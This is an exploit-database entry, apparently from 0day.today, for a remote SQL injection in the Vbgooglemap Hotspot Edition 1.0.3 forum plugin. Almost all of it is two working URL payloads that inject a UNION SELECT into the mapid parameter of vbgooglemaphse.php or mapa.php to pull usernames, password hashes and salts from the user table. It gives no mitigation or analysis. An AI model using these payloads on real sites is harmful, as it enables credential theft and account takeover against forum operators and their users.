Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability

2008-09-27T00:00:00
ID 1337DAY-ID-3777
Type zdt
Reporter elusiven
Modified 2008-09-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
====================================================================


#######################################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
#
#######################################################################

# Bug discovered by elusiven
# It was priv8

Bug: 

[Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--

or:

[Target]/[Path]/mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--


#################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION
#
#################################################



#  0day.today [2018-01-06]  #